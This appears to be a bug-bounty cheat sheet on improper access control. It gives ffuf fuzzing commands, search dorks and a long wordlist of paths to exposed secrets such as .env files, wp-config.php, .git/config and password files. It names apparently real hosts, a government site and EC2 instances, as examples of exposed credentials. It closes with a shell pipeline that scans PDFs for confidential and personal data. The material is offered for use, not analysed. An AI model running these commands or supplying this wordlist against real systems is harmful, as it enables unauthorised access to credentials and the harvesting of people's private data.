🔥Improper Access Control - Generic (CWE-284)
Improper Access Control site:www.openbugbounty.orgGDPR PII Exposure site:www.openbugbounty.orgImproper Access Control PATHS
Wordlist
ffuf -u https://website.comFUZZ -w IAC.txt
ffuf -u https://website.com:443FUZZ -w IAC.txt
ffuf -u https://website.comFUZZ/.env -w directories.txt
-----------------------------------
/.json
/.yml
/.sql
/.txt
/.env
/api/.env
/CMS
/sharing/
/composer
/Dockerfile
/.editorconfig
/webservice/.env
/fileconverter/.env
/goreMaule/.env
/admin/config.yml
/docker-compose.yml
/docker-compose.prod.yml
/docker-compose.production.yml
/docker-compose.staging.yml
/docker-compose-dev.yml
/docker-compose.override.yml
/plesk-stat/webstat-ssl/
/src/setup2/users.json
/SERVER/puphpet/config/yaml
/configuration.php
/server-status/
/.git/config
/app_dev.php/_profiler/phpinfo
/app/config/parameters.yml
/dashboard/whoishere
/health.php
/aplication/.env
/uftapp/.env
/current/.env
/payments-service/current/.env
/payments-service/current/.env
/databaseconfig.py
/movmnt-choreography-backup/.env
/em-api-acceptance-beta/current/.env
/storage/logs/laravel.log
/config/db.js
/wp-json/wp/v2/users
/custom/ajax.php
/custom-ajax.php
/.env.example
/phpinfo.php
/phpinfo.php?a
/infophp.php
/test.php
/info.php
/_profiler/phpinfo.php
/_profiler/phpinfo
/wp-json/wp/v2/users/
/?author=1
/root.log
/storage/logs/laravel.log
/request_token.php
/request_token
/access_token.php
/access_token
/settings.py
/db_default.py
/api/v2/users
/admin/.json
/system/console
/dav/crx.default
/lcrx
/bin/crxde/logs
/jcr'system/jcr'versionStorage.json
/_jcr_system/_jcr_versionStorage.json
/libs/wcm/core/content/siteadmin.html
/libs/collab/core/content/admin.html
/libs/cq/ui/content/dumplibs.html
/var/linkchecker.html
/etc/linkchecker.html
/home/users/a/admin/profile.json
/home/users/a/admin/profile.xml
/libs/cq/core/content/login.json
/data
/lcontent.pages.json
/lcontent.languages.json
/lcontent.blueprint.json
/lcontent.-l.json
/content.10.json
/lcontent.infinity.json
/lcontent.tidy.json
/lcontent.tidy.-l.blubber.json
/content/dam.tidy.-100.json
/content/content/geometrixx.sitemap.txt
/letc.xml
/lcontent.feed.xml
/lcontent.rss.xml
/lcontent.feed.html
/content/add_valid_page.html?debug=layout
/lprojects
/ltagging
/etc/replication.html
/etc/cloudservices.html
/lwelcome
/__/firebase/init.json
/db_live
/auth.json
/wp-config.php.txt
/.github/workflows/puch.yml
/info
/v1/info
/_vti_pvt/service.pwd
/master.passwd/master.passwd.txt
/servudaemon.ini
/app/config/config.local.neon
/app/etc/local.xml
/home/000~ROOT~000
/vendor/credentials
/.gitlab-ci.yml
/axis2/axis2-web/HappyAxis.jsp
/home/000~ROOT~000/
/.gitlab-ci.yml
/configurations.xml
/wp-config.php.old
/wp-config.php
/wp-config.php.txt
/.svn/wc.db
/wp-config.php.bk
/haproxy
/netdata
/app/config/config.local.neon
/appsettings.jsont
/metrics
/yahoo_site_admin/credentials/db.conf
/WEB-INF/classes/argo.properties
/appsettings.json// Some time use with app Name
Example: http://uwicer.gov.bt/uwicer/.envffuf -u https://website.comFUZZ/.env -w directories.txthttp://ec2-52-25-240-156.us-west-2.compute.amazonaws.com:443/src/setup2/users.jsonhttp://ec2-13-213-107-63.ap-southeast-1.compute.amazonaws.com/.envcat data.txt | grep --color=auto -E '\.pdf' | httpx -mc 200 -silent | xargs -I{} sh -c 'curl -s "{}" | pdftotext - - 2>/dev/null | grep -Eaiq "internal use only|confidential|strictly private|personal & confidential|private|restricted|internal|not for distribution|do not share|proprietary|trade secret|classified|sensitive|bank statement|invoice|salary|contract|agreement|non disclosure|passport|social security|ssn|date of birth|credit card|identity|id number|company confidential|staff only|management only|internal only" && echo -e "\e[31m{}\e[0m"'Last updated